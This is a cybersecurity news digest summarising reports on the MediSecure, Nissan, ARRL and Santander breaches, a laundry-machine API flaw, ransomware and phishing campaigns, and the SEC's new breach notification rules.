Students find flaw in internet-connected laundry machines, SEC adds incident response rules for financial sector, Nissan, American Radio Relay League and MediSecure Breaches, and a 21 Savage-style Cybersecurity Rap.
Breaches and Attacks in the News
MediSecure Data Breach Impacts Patient and Healthcare Provider Information
By Ionut Arghire – SecurityWeek
Australian digital prescription services provider MediSecure says data stored on its systems up until November 2023 was compromised in a recent ransomware attack. The incident, the company announced last week, originated from a third-party provider, and impacted both personal and health information belonging to patients. While the full scope of the data breach has yet to be determined, MediSecure revealed over the weekend that the compromised information is related to prescriptions delivered through its system until November 2023.
See Also: MediSecure e-script firm hit by ‘large-scale’ ransomware data breach,
Nissan reveals ransomware attack exposed 53,000 workers’ social security numbers
By Graham Cluley – Bitdefender Blog
Nissan North America has revealed that extortionists who demanded a ransom after breaking into its external VPN and disrupted systems last year also stole the social security numbers of over 53,000 staff. The security breach occurred on November 7, 2023. Upon initial investigation, Nissan and external experts brought in by the firm found that although cybercriminals had accessed its systems without authorisation, the only data access had been mostly business-related. This was communicated to workers in a Nissan Town Hall meeting on December 5, 2023. Unfortunately, Nissan now finds itself in the embarrassing position of having to warn workers that sensitive personal information was accessed by the hackers – including the names and social security numbers of over 53,000 current and former employees.
See also: Nissan infosec in the spotlight again after breach affecting more than 50K US employees, Nissan North America data breach impacts over 53,000 employees
American Radio Relay League cyberattack takes Logbook of the World offline
By Lawrence Abrams – BleepingComputer
The American Radio Relay League (ARRL) warns it suffered a cyberattack, which disrupted its IT systems and online operations, including email and the Logbook of the World. ARRL is the national association for amateur radio in the United States, representing amateur radio interests to government regulatory bodies, providing technical advice, and promoting events and educational programs for enthusiasts around the country. On Thursday, the ARRL announced that it suffered a cyberattack that disrupted its network and systems, including various online services hosted by the organization.
See also: American Radio Relay League Hit by Cyberattack
Banco Santander warns of a data breach exposing customer info
By Bill Toulas – BleepingComputer
Banco Santander S.A. announced it suffered a data breach impacting customers after an unauthorized actor accessed a database hosted by one of its third-party service providers. With a strong presence in Spain, the United Kingdom, Brazil, Mexico, and the United States, Banco Santander is one of the largest and most significant banks in the world, known for a diverse range of financial products and services, serving over 140 million customers.
Threats, Campaigns, and Techniques in the News
Students Uncover Security Bug That Could Let Millions Do Their Laundry For Free
By Dhivya – Cyber Security News
Two UC Santa Cruz students found a major security flaw in CSC ServiceWorks laundry machines. Over a million internet-connected laundry machines in homes, hotels, and colleges worldwide are affected by the bug, which allows people to run them for free. The students who discovered it, Alexander Sherbrooke and Iakov Taranenko, reported it earlier this year. Despite their attempts, CSC ServiceWorks has not fixed the vulnerability, leaving the system vulnerable. The finding occurred in early January, when Sherbrooke was seated on the floor of his basement laundry room with his laptop. He started a laundry cycle without finances by running a script. The machine replied instantly, ready to wash a free load of clothing. The students showed the weakness by establishing a fictional balance of several million dollars to one of their laundry accounts, which seemed normal in the CSC Go mobile app. Techcrunch findings, this discovery exposes a serious flaw in CSC’s mobile app’s API, which allows apps and devices to communicate online.
See also: Two students find security bug that could let millions do laundry for free, Two Students Uncovered a Flaw That Allows Using Laundry Machines for Free
Windows Quick Assist Anchors Black Basta Ransomware Gambit
By Elizabeth Montalbano – DarkReading
Following a recently documented Black Basta ransomware vishing campaign, Microsoft Threat Intelligence acknowledged May 15 that a financially motivated threat actor tracked as Storm-1811 since mid-April has been following the playbook. The threat group is using a socially engineered campaign to trick victims into letting them use Quick Assist for remote access to their machines by posing as trusted contacts, such as Microsoft technical support or an IT professional from the targeted user’s company. Quick Assist is a Windows app that enables a person to share their Windows or macOS device with someone else over a remote connection.
See also: Windows Quick Assist abused in Black Basta ransomware attacks
Latrodectus Malware Loader Emerges as IcedID’s Successor in Phishing Campaigns
The Hacker News
Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that delivers Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. “These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV share,” Elastic Security Labs researchers Daniel Stepanic and Samir Bousseaden said. Latrodectus comes with standard capabilities that are typically expected of malware designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, allowing threat actors to conduct various post-exploitation activities.
Ransomware gang targets Windows admins via PuTTy, WinSCP malvertising
By Lawrence Abrams – BleepingComputer
A ransomware operation targets Windows system administrators by taking out Google ads to promote fake download sites for Putty and WinSCP. WinSCP and Putty are popular Windows utilities, with WinSCP being an SFTP client and FTP client and Putty an SSH client. System administrators commonly have higher privileges on a Windows network, making them valuable targets for threat actors who want to quickly spread through a network, steal data, and gain access to a network’s domain controller to deploy ransomware.
Asian Threat Actors Use New Techniques to Attack Familiar Targets
By Microsoft Security – DarkReading
Since June 2023, Microsoft has observed several notable cyber and influence trends from China and North Korea that indicate nation-state threat groups are doubling down on familiar targets by using more sophisticated influence techniques to achieve their goals. To protect their organizations against the latest attack vectors and nation-state threats, security teams must remain abreast of these trends. In recent months, Chinese cyber actors have broadly targeted three core areas: entities across the South Pacific islands, regional adversaries in the South China Sea, and the US defense industrial base. Meanwhile, Chinese influence actors have been able to refine their use of AI-generated and AI-enhanced content while also experimenting with new media in an attempt to stoke divisions within the US and exacerbate rifts in the Asia-Pacific region.
Scammers Fake Docusign Templates to Blackmail & Steal From Companies
By Nate Nelson – DarkReading
Phishing emails mimicking Docusign are rising, thanks to a thriving underground marketplace for fake templates and login credentials. Over the past month, researchers from Abnormal Security claim to have tracked a significant increase in phishing attacks designed to mimic legitimate Docusign requests. A quick trip down the rabbit hole took them to a Russian cybercrime forum, where sellers peddled a variety of templates resembling authentic emails and documents. “Everybody’s been conditioned — especially after some time in the workplace — that Docusign links look a certain way,” explains Mike Britton, CISO of Abnormal Security. “It’s got the blue background, the ‘Docusign’ logo, that [characteristic] look and feel. In any given week I probably deal with half a dozen different things that I have to sign for Docusign — whether it’s from a vendor, a partner, whatever — I’m kind of conditioned to see it, click it, and kind of go into autopilot.”
Black Basta ransomware group’s techniques evolve, as FBI issues new warning in wake of hospital attack
By Graham Cluley – Exponentiale Blog
Security agencies in the United States have issued a new warning about the Black Basta ransomware group, in the wake of a high-profile attack against the healthcare giant Ascension. The cyber attack last week forced the Ascension computer systems offline, and caused some hospital emergency departments to turn away ambulances “in order to ensure emergency cases are triaged immediately.” In a statement, Ascension confirmed that while its hospitals were providing healthcare, the ransomware attack meant that its electronic health records and other systems used to order tests, procedures, and medications were currently unavailable.
Cybersecurity Regulations in the News
SEC: Financial orgs have 30 days to send data breach notifications
By Bill Toulas – BleepingComputer
The Securities and Exchange Commission (SEC) has adopted amendments to Regulation S-P that require certain financial institutions to disclose data breach incidents to impacted individuals within 30 days of discovery. Regulation S-P was introduced in 2000 and controls how some financial entities must treat nonpublic personal information belonging to consumers. These rules include developing and implementing data protection policies, confidentiality and security assurances, and protecting against anticipated threats. The new amendments adopted earlier this week impact financial firms, such as broker-dealers (funding portals included), investment firms, registered investment advisers, and transfer agents. The modifications were initially proposed in March of last year to modernize and improve the protection of individual financial information from data breaches and exposure to non-affiliated parties.
See also: SEC Adds New Incident Response Rules for Financial Sector, Financial institutions ordered to notify customers after a breach, have an incident response plan
Cybersecurity Opinions in the News
CISOs Grapple With IBM’s Unexpected Cybersecurity Software Exit
By Jeffrey Schwartz – DarkReading
IBM’s surprise departure from cybersecurity software this week didn’t just rearrange the competitive landscape — it also reshuffled the procurement plans and vendor relationships for many CISOs rebuilding their SOCs. IBM has agreed to sell the QRadar SaaS portfolio to Palo Alto Networks for an undisclosed sum. After years of development, IBM started rolling out the QRadar Suite in 2023, a cloud-native set of shared endpoint security components, including multiple detection and response products (EDR, XDR, and MDR), along with log management capabilities, notably security information and event management (SIEM) and security orchestration, automation, and response (SOAR) platforms.
Addressing the Cybersecurity Vendor Ecosystem Disconnect
By Andrew Morriss – DarkReading
If you are a member of the security team in charge of defending a network, you are probably accustomed to working with a technology stack composed of hardware (computers, servers, appliances, and network gear), software (applications and services), and data (logs and packet captures) from dozens of different sources. All of these tools generate a wealth of information that needs to be merged and then combined with your own internal systems and data to triage and defend against attacks. Consolidating and joining this data can be complex and difficult for customers, but it has become status quo in the technology industry. Everyone knows that if you want a functional technology stack, you need to invest a significant portion of your budget in a variety of overlapping tools and services and then be prepared to invest a substantial amount of time on an ongoing basis to make the information relevant and useful for your own business. There doesn’t appear to be any way around it.
CISO Corner: What Cyber Labor Shortage?; Trouble Meeting SEC Disclosure Deadlines
By Tara Seals – DarkReading
In this week’s CISO corner: CISOs & Their Companies Struggle to Comply with SEC Disclosure Rules, Podcast: Dark Reading Confidential: The CISO & the SEC, Top 5 Most Dangerous Cyber Threats in 2024, DR Global: Singapore Cybersecurity Update Puts Cloud Providers on Notice, There Is No Cyber Labor Shortage, and Is CISA’s Secure by Design Pledge Toothless?